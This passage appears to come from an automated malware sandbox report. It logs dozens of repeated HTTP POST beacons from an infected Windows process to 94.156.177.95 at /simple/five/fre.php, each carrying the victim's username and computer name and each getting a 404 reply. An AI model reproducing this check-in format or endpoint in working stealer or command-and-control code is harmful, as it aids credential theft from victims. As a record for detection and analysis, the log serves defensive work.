                                                                                                                    Nov 15, 2024 18:15:26.198172092 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:27.521374941 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:27 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    49192.168.2.55002594.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:27.675182104 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:27.680896997 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:28.641117096 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:28 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    50192.168.2.55002694.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:28.788830042 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:28.793698072 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:29.754606009 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:29 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    51192.168.2.55002794.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:29.920413017 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:29.925407887 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:30.894785881 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:30 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    52192.168.2.55002894.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:31.047650099 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:31.052611113 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:32.048650980 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:31 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    53192.168.2.55002994.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:32.208452940 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:32.214107990 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:33.168128967 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:33 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    54192.168.2.55003094.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:33.327476978 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:33.332376003 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:34.322305918 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:34 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    55192.168.2.55003194.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:34.474889040 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:34.479836941 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:35.458338022 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:35 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    56192.168.2.55003294.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:35.613207102 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:35.618187904 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:36.584152937 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:36 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    57192.168.2.55003394.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:36.740186930 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:36.745165110 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:37.681458950 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:37 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    58192.168.2.55003494.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:37.830840111 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:37.835645914 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:38.775286913 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:38 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    59192.168.2.55003594.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:38.925018072 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:38.930011034 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:39.883445024 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:39 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    60192.168.2.55003694.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:40.036921024 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:40.041826010 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:40.977866888 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:40 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    61192.168.2.55003794.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:41.128297091 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:41.133212090 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:42.128469944 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:41 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    62192.168.2.55003894.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:42.282579899 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:42.287477016 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:43.271620989 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:43 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    63192.168.2.55003994.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:43.427052021 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:43.432085037 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:44.406034946 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:44 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    64192.168.2.55004094.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:44.553605080 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:44.558614016 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:45.497798920 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:45 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
